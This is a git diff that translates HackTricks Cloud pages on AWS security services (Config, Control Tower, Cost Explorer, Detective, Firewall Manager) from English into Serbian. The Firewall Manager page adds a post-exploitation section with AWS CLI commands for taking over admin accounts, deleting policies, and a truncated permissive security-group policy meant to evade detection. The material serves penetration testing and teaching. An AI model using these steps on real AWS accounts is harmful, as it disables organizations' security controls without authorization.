+Config pravila su odličan način da vam pomognu da **sprovodite specifične provere usklađenosti** **i kontrole preko vaših resursa**, i omogućavaju vam da usvojite idealnu specifikaciju implementacije za svaki od vaših tipova resursa. Svako pravilo **je u suštini lambda funkcija** koja, kada se pozove, procenjuje resurs i sprovodi neku jednostavnu logiku da odredi rezultat usklađenosti sa pravilom. **Svaki put kada se izvrši promena** na jednom od vaših podržanih resursa, **AWS Config će proveriti usklađenost sa bilo kojim config pravilima koja imate na snazi**.\
+AWS ima niz **predefinisanih pravila** koja spadaju pod sigurnosni kišobran i spremna su za korišćenje. Na primer, Rds-storage-encrypted. Ovo proverava da li je enkripcija skladišta aktivirana od strane vaših RDS baza podataka. Encrypted-volumes. Ovo proverava da li su svi EBS volumeni koji imaju stanje povezano enkriptovani.
 
-- **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist.
-- **Custom rules**: You can create your own rules to check specific customconfigurations.
+- **AWS upravljana pravila**: Skup predefinisanih pravila koja pokrivaju mnogo najboljih praksi, tako da uvek vredi prvo pregledati ova pravila pre nego što postavite svoja, jer postoji šansa da pravilo već postoji.
+- **Prilagođena pravila**: Možete kreirati svoja pravila za proveru specifičnih prilagođenih konfiguracija.
 
-Limit of 50 config rules per region before you need to contact AWS for an increase.\
-Non compliant results are NOT deleted.
+Limit od 50 config pravila po regionu pre nego što morate kontaktirati AWS za povećanje.\
+Neusaglašeni rezultati se NE brišu.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
index 9fab39fb8..434c85061 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
@@ -5,33 +5,31 @@
 ## Control Tower
 
 > [!NOTE]
-> In summary, Control Tower is a service that allows to define policies for all your accounts inside your org. So instead of managing each of the you can set policies from Control Tower that will be applied on them.
+> Ukratko, Control Tower je usluga koja omogućava definisanje politika za sve vaše naloge unutar vaše organizacije. Tako da umesto da upravljate svakim od njih, možete postaviti politike iz Control Tower-a koje će se primenjivati na njih.
 
-AWS Control Tower is a **service provided by Amazon Web Services (AWS)** that enables organizations to set up and govern a secure, compliant, multi-account environment in AWS.
+AWS Control Tower je **usluga koju pruža Amazon Web Services (AWS)** koja omogućava organizacijama da postave i upravljaju sigurnim, usklađenim, višekratnim okruženjem u AWS-u.
 
-AWS Control Tower provides a **pre-defined set of best-practice blueprints** that can be customized to meet specific **organizational requirements**. These blueprints include pre-configured AWS services and features, such as AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail, and AWS Service Catalog.
+AWS Control Tower pruža **predefinisani set najboljih praksi** koji se može prilagoditi specifičnim **organizacijskim zahtevima**. Ove prakse uključuju unapred konfigurisane AWS usluge i funkcije, kao što su AWS Single Sign-On (SSO), AWS Config, AWS CloudTrail i AWS Service Catalog.
 
-With AWS Control Tower, administrators can quickly set up a **multi-account environment that meets organizational requirements**, such as **security** and compliance. The service provides a central dashboard to view and manage accounts and resources, and it also automates the provisioning of accounts, services, and policies.
+Sa AWS Control Tower-om, administratori mogu brzo postaviti **višekratno okruženje koje ispunjava organizacione zahteve**, kao što su **bezbednost** i usklađenost. Usluga pruža centralnu kontrolnu tablu za pregled i upravljanje nalozima i resursima, a takođe automatizuje dodeljivanje naloga, usluga i politika.
 
-In addition, AWS Control Tower provides guardrails, which are a set of pre-configured policies that ensure the environment remains compliant with organizational requirements. These policies can be customized to meet specific needs.
+Pored toga, AWS Control Tower pruža zaštitne mere, koje su set unapred konfiguranih politika koje osiguravaju da okruženje ostane usklađeno sa organizacionim zahtevima. Ove politike se mogu prilagoditi specifičnim potrebama.
 
-Overall, AWS Control Tower simplifies the process of setting up and managing a secure, compliant, multi-account environment in AWS, making it easier for organizations to focus on their core business objectives.
+Sve u svemu, AWS Control Tower pojednostavljuje proces postavljanja i upravljanja sigurnim, usklađenim, višekratnim okruženjem u AWS-u, olakšavajući organizacijama da se fokusiraju na svoje osnovne poslovne ciljeve.
 
 ### Enumeration
 
-For enumerating controltower controls, you first need to **have enumerated the org**:
+Za enumeraciju kontrola controltower-a, prvo morate **da ste enumerisali organizaciju**:
 
 {{#ref}}
 ../aws-organizations-enum.md
 {{#endref}}
-
 ```bash
 # Get controls applied in an account
 aws controltower list-enabled-controls --target-identifier arn:aws:organizations:::ou/
 ```
-
 > [!WARNING]
-> Control Tower can also use **Account factory** to execute **CloudFormation templates** in **accounts and run services** (privesc, post-exploitation...) in those accounts
+> Control Tower može takođe koristiti **Account factory** za izvršavanje **CloudFormation šablona** u **nalozima i pokretanje usluga** (privesc, post-exploitation...) u tim nalozima
 
 ### Post Exploitation & Persistence
 
@@ -40,7 +38,3 @@ aws controltower list-enabled-controls --target-identifier arn:aws:organizations
 {{#endref}}
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
index 2f967331b..090cf6449 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md
@@ -2,18 +2,14 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Cost Explorer and Anomaly detection
+## Cost Explorer i detekcija anomalija
 
-This allows you to check **how are you expending money in AWS services** and help you **detecting anomalies**.\
-Moreover, you can configure an anomaly detection so AWS will warn you when some a**nomaly in costs is found**.
+Ovo vam omogućava da proverite **kako trošite novac na AWS usluge** i pomaže vam u **detekciji anomalija**.\
+Pored toga, možete konfigurisati detekciju anomalija tako da vas AWS upozori kada se pronađe neka **anomalija u troškovima**.
 
-### Budgets
+### Budžeti
 
-Budgets help to **manage costs and usage**. You can get **alerted when a threshold is reached**.\
-Also, they can be used for non cost related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
+Budžeti pomažu u **upravljanju troškovima i korišćenjem**. Možete dobiti **obaveštenje kada se dostigne prag**.\
+Takođe, mogu se koristiti za praćenje koje nije povezano sa troškovima, kao što je korišćenje usluge (koliko GB se koristi u određenom S3 bucket-u?).
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
index 9d1a40eba..ea146ab4f 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md
@@ -4,9 +4,9 @@
 
 ## Detective
 
-**Amazon Detective** streamlines the security investigation process, making it more efficient to **analyze, investigate, and pinpoint the root cause** of security issues or unusual activities. It automates the collection of log data from AWS resources and employs **machine learning, statistical analysis, and graph theory** to construct an interconnected data set. This setup greatly enhances the speed and effectiveness of security investigations.
+**Amazon Detective** pojednostavljuje proces istraživanja bezbednosti, čineći ga efikasnijim za **analizu, istraživanje i identifikaciju uzroka** bezbednosnih problema ili neobičnih aktivnosti. Automatski prikuplja podatke o logovima iz AWS resursa i koristi **mašinsko učenje, statističku analizu i teoriju grafova** za izgradnju međusobno povezanog skupa podataka. Ova postavka značajno poboljšava brzinu i efikasnost istraživanja bezbednosti.
 
-The service eases in-depth exploration of security incidents, allowing security teams to swiftly understand and address the underlying causes of issues. Amazon Detective analyzes vast amounts of data from sources like VPC Flow Logs, AWS CloudTrail, and Amazon GuardDuty. It automatically generates a **comprehensive, interactive view of resources, users, and their interactions over time**. This integrated perspective provides all necessary details and context in one location, enabling teams to discern the reasons behind security findings, examine pertinent historical activities, and rapidly determine the root cause.
+Usluga olakšava dubinsko istraživanje bezbednosnih incidenata, omogućavajući timovima za bezbednost da brzo razumeju i reše osnovne uzroke problema. Amazon Detective analizira ogromne količine podataka iz izvora kao što su VPC Flow Logs, AWS CloudTrail i Amazon GuardDuty. Automatski generiše **sveobuhvatan, interaktivan prikaz resursa, korisnika i njihovih interakcija tokom vremena**. Ova integrisana perspektiva pruža sve potrebne detalje i kontekst na jednom mestu, omogućavajući timovima da razjasne razloge iza bezbednosnih nalaza, ispituju relevantne istorijske aktivnosti i brzo utvrde uzrok.
 
 ## References
 
@@ -14,7 +14,3 @@ The service eases in-depth exploration of security incidents, allowing security
 - [https://cloudsecdocs.com/aws/services/logging/other/#detective](https://cloudsecdocs.com/aws/services/logging/other/#detective)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
index 0369f075c..0084a34e5 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md
@@ -4,80 +4,79 @@
 
 ## Firewall Manager
 
-**AWS Firewall Manager** streamlines the management and maintenance of **AWS WAF, AWS Shield Advanced, Amazon VPC security groups and Network Access Control Lists (ACLs), and AWS Network Firewall, AWS Route 53 Resolver DNS Firewall and third-party firewalls** across multiple accounts and resources. It enables you to configure your firewall rules, Shield Advanced protections, VPC security groups, and Network Firewall settings just once, with the service **automatically enforcing these rules and protections across your accounts and resources**, including newly added ones.
+**AWS Firewall Manager** pojednostavljuje upravljanje i održavanje **AWS WAF, AWS Shield Advanced, Amazon VPC sigurnosnih grupa i mrežnih kontrolnih lista (ACL), kao i AWS Network Firewall, AWS Route 53 Resolver DNS Firewall i vatrozida trećih strana** širom više naloga i resursa. Omogućava vam da konfigurišete pravila vatrozida, Shield Advanced zaštite, VPC sigurnosne grupe i postavke mrežnog vatrozida samo jednom, uz to što **usluga automatski sprovodi ova pravila i zaštite širom vaših naloga i resursa**, uključujući novododate.
 
-The service offers the capability to **group and safeguard specific resources together**, like those sharing a common tag or all your CloudFront distributions. A significant advantage of Firewall Manager is its ability to **automatically extend protection to newly added resources** in your account.
+Usluga nudi mogućnost da **grupisete i zaštitite specifične resurse zajedno**, kao što su oni koji dele zajedničku oznaku ili sve vaše CloudFront distribucije. Značajna prednost Firewall Manager-a je njegova sposobnost da **automatski proširi zaštitu na novododate resurse** u vašem nalogu.
 
-A **rule group** (a collection of WAF rules) can be incorporated into an AWS Firewall Manager Policy, which is then linked to specific AWS resources such as CloudFront distributions or application load balancers.
+**Grupa pravila** (kolekcija WAF pravila) može biti uključena u AWS Firewall Manager politiku, koja je zatim povezana sa specifičnim AWS resursima kao što su CloudFront distribucije ili aplikacijski balansatori opterećenja.
 
-AWS Firewall Manager provides **managed application and protocol lists** to simplify the configuration and management of security group policies. These lists allow you to define the protocols and applications permitted or denied by your policies. There are two types of managed lists:
+AWS Firewall Manager pruža **upravljane liste aplikacija i protokola** kako bi pojednostavio konfiguraciju i upravljanje politikama sigurnosnih grupa. Ove liste vam omogućavaju da definišete protokole i aplikacije koje su dozvoljene ili zabranjene vašim politikama. Postoje dve vrste upravljanih lista:
 
-- **Firewall Manager managed lists**: These lists include **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** and **FMS-Default-Protocols-Allowed**. They are managed by Firewall Manager and include commonly used applications and protocols that should be allowed or denied to the general public. It is not possible to edit or delete them, however, you can choose its version.
-- **Custom managed lists**: You manage these lists yourself. You can create custom application and protocol lists tailored to your organization's needs. Unlike Firewall Manager managed lists, these lists do not have versions, but you have full control over custom lists, allowing you to create, edit, and delete them as required.
+- **Upravljane liste Firewall Manager-a**: Ove liste uključuju **FMS-Default-Public-Access-Apps-Allowed**, **FMS-Default-Protocols-Allowed** i **FMS-Default-Protocols-Allowed**. Njima upravlja Firewall Manager i uključuju često korišćene aplikacije i protokole koji bi trebali biti dozvoljeni ili zabranjeni široj javnosti. Nije moguće uređivati ili brisati ove liste, međutim, možete odabrati njihovu verziju.
+- **Prilagođene upravljane liste**: Ove liste upravljate sami. Možete kreirati prilagođene liste aplikacija i protokola prilagođene potrebama vaše organizacije. Za razliku od upravljanih lista Firewall Manager-a, ove liste nemaju verzije, ali imate potpunu kontrolu nad prilagođenim listama, što vam omogućava da ih kreirate, uređujete i brišete prema potrebi.
 
-It's important to note that **Firewall Manager policies permit only "Block" or "Count" actions** for a rule group, without an "Allow" option.
+Važno je napomenuti da **Firewall Manager politike dozvoljavaju samo "Block" ili "Count" akcije** za grupu pravila, bez opcije "Allow".
 
 ### Prerequisites
 
-The following prerequisite steps must be completed before proceeding to configure Firewall Manager to begin protecting your organization's resources effectively. These steps provide the foundational setup required for Firewall Manager to enforce security policies and ensure compliance across your AWS environment:
+Sledeći preduslovi moraju biti ispunjeni pre nego što nastavite sa konfigurisanjem Firewall Manager-a kako biste efikasno zaštitili resurse vaše organizacije. Ovi koraci pružaju osnovnu postavku potrebnu za Firewall Manager da sprovodi sigurnosne politike i osigura usklađenost širom vašeg AWS okruženja:
 
-1. **Join and configure AWS Organizations:** Ensure your AWS account is part of the AWS Organizations organization where the AWS Firewall Manager policies are planned to be implanted. This allows for centralized management of resources and policies across multiple AWS accounts within the organization.
-2. **Create an AWS Firewall Manager Default Administrator Account:** Establish a default administrator account specifically for managing Firewall Manager security policies. This account will be responsible for configuring and enforcing security policies across the organization. Just the management account of the organization is able to create Firewall Manager default administrator accounts.
-3. **Enable AWS Config:** Activate AWS Config to provide Firewall Manager with the necessary configuration data and insights required to effectively enforce security policies. AWS Config helps analyze, audit, monitor and audit resource configurations and changes, facilitating better security management.
-4. **For Third-Party Policies, Subscribe in the AWS Marketplace and Configure Third-Party Settings:** If you plan to utilize third-party firewall policies, subscribe to them in the AWS Marketplace and configure the necessary settings. This step ensures that Firewall Manager can integrate and enforce policies from trusted third-party vendors.
-5. **For Network Firewall and DNS Firewall Policies, enable resource sharing:** Enable resource sharing specifically for Network Firewall and DNS Firewall policies. This allows Firewall Manager to apply firewall protections to your organization's VPCs and DNS resolution, enhancing network security.
-6. **To use AWS Firewall Manager in Regions that are disabled by default:** If you intend to use Firewall Manager in AWS regions that are disabled by default, ensure that you take the necessary steps to enable its functionality in those regions. This ensures consistent security enforcement across all regions where your organization operates.
+1. **Pridružite se i konfigurišite AWS Organizations:** Osigurajte da je vaš AWS nalog deo AWS Organizations organizacije u kojoj su planirane AWS Firewall Manager politike. Ovo omogućava centralizovano upravljanje resursima i politikama širom više AWS naloga unutar organizacije.
+2. **Kreirajte AWS Firewall Manager Default Administrator Account:** Uspostavite podrazumevani administratorski nalog posebno za upravljanje Firewall Manager sigurnosnim politikama. Ovaj nalog će biti odgovoran za konfiguraciju i sprovođenje sigurnosnih politika širom organizacije. Samo upravljački nalog organizacije može kreirati podrazumevane administratorske naloge Firewall Manager-a.
+3. **Omogućite AWS Config:** Aktivirajte AWS Config kako biste Firewall Manager-u pružili potrebne podatke o konfiguraciji i uvide potrebne za efikasno sprovođenje sigurnosnih politika. AWS Config pomaže u analizi, reviziji, praćenju i reviziji konfiguracija resursa i promena, olakšavajući bolje upravljanje sigurnošću.
+4. **Za politike trećih strana, pretplatite se u AWS Marketplace i konfigurišite postavke trećih strana:** Ako planirate da koristite politike vatrozida trećih strana, pretplatite se na njih u AWS Marketplace-u i konfigurišite potrebne postavke. Ovaj korak osigurava da Firewall Manager može integrisati i sprovoditi politike od pouzdanih dobavljača trećih strana.
+5. **Za politike mrežnog vatrozida i DNS vatrozida, omogućite deljenje resursa:** Omogućite deljenje resursa posebno za politike mrežnog vatrozida i DNS vatrozida. Ovo omogućava Firewall Manager-u da primeni zaštitu vatrozida na VPC-ove vaše organizacije i DNS rezoluciju, poboljšavajući mrežnu sigurnost.
+6. **Da biste koristili AWS Firewall Manager u regionima koji su podrazumevano onemogućeni:** Ako nameravate da koristite Firewall Manager u AWS regionima koji su podrazumevano onemogućeni, osigurajte da preduzmete potrebne korake da omogućite njegovu funkcionalnost u tim regionima. Ovo osigurava dosledno sprovođenje sigurnosti širom svih regiona u kojima vaša organizacija posluje.
 
-For more information, check: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
+Za više informacija, pogledajte: [Getting started with AWS Firewall Manager AWS WAF policies](https://docs.aws.amazon.com/waf/latest/developerguide/getting-started-fms.html).
 
 ### Types of protection policies
 
-AWS Firewall Manager manages several types of policies to enforce security controls across different aspects of your organization's infrastructure:
+AWS Firewall Manager upravlja nekoliko vrsta politika za sprovođenje sigurnosnih kontrola širom različitih aspekata infrastrukture vaše organizacije:
 
-1. **AWS WAF Policy:** This policy type supports both AWS WAF and AWS WAF Classic. You can define which resources are protected by the policy. For AWS WAF policies, you can specify sets of rule groups to run first and last in the web ACL. Additionally, account owners can add rules and rule groups to run in between these sets.
-2. **Shield Advanced Policy:** This policy applies Shield Advanced protections across your organization for specified resource types. It helps safeguard against DDoS attacks and other threats.
-3. **Amazon VPC Security Group Policy:** With this policy, you can manage security groups used throughout your organization, enforcing a baseline set of rules across your AWS environment to control network access.
-4. **Amazon VPC Network Access Control List (ACL) Policy:** This policy type gives you control over network ACLs used in your organization, allowing you to enforce a baseline set of network ACLs across your AWS environment.
-5. **Network Firewall Policy:** This policy applies AWS Network Firewall protection to your organization's VPCs, enhancing network security by filtering traffic based on predefined rules.
-6. **Amazon Route 53 Resolver DNS Firewall Policy:** This policy applies DNS Firewall protections to your organization's VPCs, helping to block malicious domain resolution attempts and enforce security policies for DNS traffic.
-7. **Third-Party Firewall Policy:** This policy type applies protections from third-party firewalls, which are available by subscription through the AWS Marketplace console. It allows you to integrate additional security measures from trusted vendors into your AWS environment.
-   1. **Palo Alto Networks Cloud NGFW Policy:** This policy applies Palo Alto Networks Cloud Next Generation Firewall (NGFW) protections and rulestacks to your organization's VPCs, providing advanced threat prevention and application-level security controls.
-   2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** This policy applies Fortigate Cloud Native Firewall (CNF) as a Service protections, offering industry-leading threat prevention, web application firewall (WAF), and API protection tailored for cloud infrastructures.
+1. **AWS WAF Policy:** Ova vrsta politike podržava i AWS WAF i AWS WAF Classic. Možete definisati koji resursi su zaštićeni politikom. Za AWS WAF politike, možete odrediti skupove grupa pravila koje će se izvršiti prvo i poslednje u web ACL-u. Pored toga, vlasnici naloga mogu dodavati pravila i grupe pravila koja će se izvršiti između ovih skupova.
+2. **Shield Advanced Policy:** Ova politika primenjuje Shield Advanced zaštite širom vaše organizacije za određene tipove resursa. Pomaže u zaštiti od DDoS napada i drugih pretnji.
+3. **Amazon VPC Security Group Policy:** Sa ovom politikom, možete upravljati sigurnosnim grupama koje se koriste širom vaše organizacije, sprovodeći osnovni skup pravila širom vašeg AWS okruženja kako biste kontrolisali mrežni pristup.
+4. **Amazon VPC Network Access Control List (ACL) Policy:** Ova vrsta politike daje vam kontrolu nad mrežnim ACL-ima koji se koriste u vašoj organizaciji, omogućavajući vam da sprovodite osnovni skup mrežnih ACL-a širom vašeg AWS okruženja.
+5. **Network Firewall Policy:** Ova politika primenjuje AWS Network Firewall zaštitu na VPC-ove vaše organizacije, poboljšavajući mrežnu sigurnost filtriranjem saobraćaja na osnovu unapred definisanih pravila.
+6. **Amazon Route 53 Resolver DNS Firewall Policy:** Ova politika primenjuje DNS Firewall zaštite na VPC-ove vaše organizacije, pomažući u blokiranju pokušaja zlonamerne rezolucije domena i sprovođenju sigurnosnih politika za DNS saobraćaj.
+7. **Third-Party Firewall Policy:** Ova vrsta politike primenjuje zaštite od vatrozida trećih strana, koje su dostupne putem pretplate kroz AWS Marketplace konzolu. Omogućava vam da integrišete dodatne sigurnosne mere od pouzdanih dobavljača u vaše AWS okruženje.
+1. **Palo Alto Networks Cloud NGFW Policy:** Ova politika primenjuje zaštite i pravila Palo Alto Networks Cloud Next Generation Firewall (NGFW) na VPC-ove vaše organizacije, pružajući naprednu prevenciju pretnji i kontrole sigurnosti na nivou aplikacija.
+2. **Fortigate Cloud Native Firewall (CNF) as a Service Policy:** Ova politika primenjuje zaštite Fortigate Cloud Native Firewall (CNF) kao uslugu, nudeći vodeću prevenciju pretnji, web aplikacijski vatrozid (WAF) i zaštitu API-ja prilagođenu za cloud infrastrukture.
 
 ### Administrator accounts
 
-AWS Firewall Manager offers flexibility in managing firewall resources within your organization through its administrative scope and two types of administrator accounts.
+AWS Firewall Manager nudi fleksibilnost u upravljanju resursima vatrozida unutar vaše organizacije kroz svoj administrativni opseg i dva tipa administratorskih naloga.
 
-**Administrative scope defines the resources that a Firewall Manager administrator can manage**. After an AWS Organizations management account onboards an organization to Firewall Manager, it can create additional administrators with different administrative scopes. These scopes can include:
+**Administrativni opseg definiše resurse kojima administrator Firewall Manager-a može upravljati**. Nakon što AWS Organizations upravljački nalog onboard-uje organizaciju u Firewall Manager, može kreirati dodatne administratore sa različitim administrativnim opsezima. Ovi opsezi mogu uključivati:
 
-- Accounts or organizational units (OUs) that the administrator can apply policies to.
-- Regions where the administrator can perform actions.
-- Firewall Manager policy types that the administrator can manage.
+- Nalozi ili organizacione jedinice (OU) na koje administrator može primeniti politike.
+- Regioni u kojima administrator može izvršavati akcije.
+- Tipovi politika Firewall Manager-a kojima administrator može upravljati.
 
-Administrative scope can be either **full or restricted**. Full scope grants the administrator access to **all specified resource types, regions, and policy types**. In contrast, **restricted scope provides administrative permission to only a subset of resources, regions, or policy types**. It's advisable to grant administrators only the permissions they need to fulfill their roles effectively. You can apply any combination of these administrative scope conditions to an administrator, ensuring adherence to the principle of least privilege.
+Administrativni opseg može biti **potpun ili ograničen**. Potpuni opseg daje administratoru pristup **svim navedenim tipovima resursa, regionima i tipovima politika**. Nasuprot tome, **ograničeni opseg pruža administrativna prava samo na podskup resursa, regiona ili tipova politika**. Preporučuje se da se administratorima dodele samo prava koja su im potrebna da efikasno obavljaju svoje uloge. Možete primeniti bilo koju kombinaciju ovih uslova administrativnog opsega na administratora, osiguravajući pridržavanje principa minimalnih privilegija.
 
-There are two distinct types of administrator accounts, each serving specific roles and responsibilities:
+Postoje dva različita tipa administratorskih naloga, svaki sa specifičnim ulogama i odgovornostima:
 
-- **Default Administrator:**
-  - The default administrator account is created by the AWS Organizations organization's management account during the onboarding process to Firewall Manager.
-  - This account has the capability to manage third-party firewalls and possesses full administrative scope.
-  - It serves as the primary administrator account for Firewall Manager, responsible for configuring and enforcing security policies across the organization.
-  - While the default administrator has full access to all resource types and administrative functionalities, it operates at the same peer level as other administrators if multiple administrators are utilized within the organization.
-- **Firewall Manager Administrators:**
-  - These administrators can manage resources within the scope designated by the AWS Organizations management account, as defined by the administrative scope configuration.
-  - Firewall Manager administrators are created to fulfill specific roles within the organization, allowing for delegation of responsibilities while maintaining security and compliance standards.
-  - Upon creation, Firewall Manager checks with AWS Organizations to determine if the account is already a delegated administrator. If not, Firewall Manager calls Organizations to designate the account as a delegated administrator for Firewall Manager.
+- **Podrazumevani administrator:**
+- Podrazumevani administratorski nalog kreira upravljački nalog AWS Organizations organizacije tokom onboardinga u Firewall Manager.
+- Ovaj nalog ima sposobnost da upravlja vatrozidima trećih strana i poseduje potpuni administrativni opseg.
+- Služi kao primarni administratorski nalog za Firewall Manager, odgovoran za konfiguraciju i sprovođenje sigurnosnih politika širom organizacije.
+- Dok podrazumevani administrator ima potpuni pristup svim tipovima resursa i administrativnim funkcionalnostima, deluje na istom nivou kao i drugi administratori ako se više administratora koristi unutar organizacije.
+- **Administratori Firewall Manager-a:**
+- Ovi administratori mogu upravljati resursima unutar opsega koji je odredio upravljački nalog AWS Organizations, kako je definisano konfiguracijom administrativnog opsega.
+- Administratori Firewall Manager-a se kreiraju da ispune specifične uloge unutar organizacije, omogućavajući delegaciju odgovornosti dok se održavaju standardi sigurnosti i usklađenosti.
+- Prilikom kreiranja, Firewall Manager proverava sa AWS Organizations da li je nalog već delegirani administrator. Ako nije, Firewall Manager poziva Organizations da odredi nalog kao delegiranog administratora za Firewall Manager.
 
-Managing these administrator accounts involves creating them within Firewall Manager and defining their administrative scopes according to the organization's security requirements and the principle of least privilege. By assigning appropriate administrative roles, organizations can ensure effective security management while maintaining granular control over access to sensitive resources.
+Upravljanje ovim administratorskim nalozima uključuje njihovo kreiranje unutar Firewall Manager-a i definisanje njihovih administrativnih opsega prema sigurnosnim zahtevima organizacije i principu minimalnih privilegija. Dodeljivanjem odgovarajućih administrativnih uloga, organizacije mogu osigurati efikasno upravljanje sigurnošću dok održavaju granularnu kontrolu nad pristupom osetljivim resursima.
 
-It is important to highlight that **only one account within an organization can serve as the Firewall Manager default administrator**, adhering to the principle of "**first in, last out**". To designate a new default administrator, a series of steps must be followed:
+Važno je naglasiti da **samo jedan nalog unutar organizacije može služiti kao podrazumevani administrator Firewall Manager-a**, pridržavajući se principa "**prvi unutra, poslednji napolju**". Da biste odredili novog podrazumevanog administratora, mora se slediti niz koraka:
 
-- First, each Firewall Administrator administrator account must revoke their own account.
-- Then, the existing default administrator can revoke their own account, effectively offboarding the organization from Firewall Manager. This process results in the deletion of all Firewall Manager policies created by the revoked account.
-- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator.
+- Prvo, svaki Firewall Administrator administratorski nalog mora opozvati svoj nalog.
+- Zatim, postojeći podrazumevani administrator može opozvati svoj nalog, efektivno isključujući organizaciju iz Firewall Manager-a. Ovaj proces rezultira brisanjem svih Firewall Manager politika koje je kreirao opozvani nalog.
+- Na kraju, upravljački nalog AWS Organizations mora odrediti podrazumevanog administratora Firewall Manager-a.
 
 ## Enumeration
-
 ```
 # Users/Administrators
 
@@ -162,66 +161,58 @@ aws fms get-third-party-firewall-association-status --third-party-firewall  --member-account  --resource-id  --resource-type 
 ```
-
-## Post Exploitation / Bypass Detection
+## Post Exploatacija / Obilaženje Detekcije
 
 ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`)
 
-An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association.
-
-- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account.
-- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**.
-- The creation of a Firewall Manager administrator account can only be done by the organization's management account.
+Napadač sa **`fms:AssociateAdminAccount`** dozvolom bi mogao da postavi podrazumevani administratorski nalog Firewall Manager-a. Sa **`fms:PutAdminAccount`** dozvolom, napadač bi mogao da kreira ili ažurira administratorski nalog Firewall Manager-a, a sa **`fms:DisassociateAdminAccount`** dozvolom, potencijalni napadač bi mogao da ukloni trenutnu asocijaciju administratorskog naloga Firewall Manager-a.
 
+- Uklanjanje asocijacije **podrazumevanog administratora Firewall Manager-a prati politiku prvi unutra, poslednji napolje**. Svi administratori Firewall Manager-a moraju da se odjave pre nego što podrazumevani administrator Firewall Manager-a može da ukloni nalog.
+- Da bi se kreirao administrator Firewall Manager-a putem **PutAdminAccount**, nalog mora pripadati organizaciji koja je prethodno onboardovana na Firewall Manager koristeći **AssociateAdminAccount**.
+- Kreiranje administratorskog naloga Firewall Manager-a može se izvršiti samo od strane upravljačkog naloga organizacije.
 ```bash
 aws fms associate-admin-account --admin-account 
 aws fms disassociate-admin-account
 aws fms put-admin-account --admin-account 
 ```
-
-**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potencijalni uticaj:** Gubitak centralizovanog upravljanja, izbegavanje politika, kršenje usklađenosti i prekid bezbednosnih kontrola unutar okruženja.
 
 ### `fms:PutPolicy`, `fms:DeletePolicy`
 
-An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy.
-
+Napadač sa **`fms:PutPolicy`**, **`fms:DeletePolicy`** dozvolama mogao bi da kreira, menja ili trajno obriše AWS Firewall Manager politiku.
 ```bash
 aws fms put-policy --policy  | --cli-input-json file:// [--tag-list ]
 aws fms delete-policy --policy-id  [--delete-all-policy-resources | --no-delete-all-policy-resources]
 ```
-
-An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one:
-
+Primer permisivne politike kroz permisivnu sigurnosnu grupu, kako bi se zaobišla detekcija, mogao bi biti sledeći:
 ```json
 {
-  "Policy": {
-    "PolicyName": "permisive_policy",
-    "SecurityServicePolicyData": {
-      "Type": "SECURITY_GROUPS_COMMON",
-      "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
-    },
-    "ResourceTypeList": [
-      "AWS::EC2::Instance",
-      "AWS::EC2::NetworkInterface",
-      "AWS::EC2::SecurityGroup",
-      "AWS::ElasticLoadBalancingV2::LoadBalancer",
-      "AWS::ElasticLoadBalancing::LoadBalancer"
-    ],
-    "ResourceType": "AWS::EC2::SecurityGroup",
-    "ExcludeResourceTags": false,
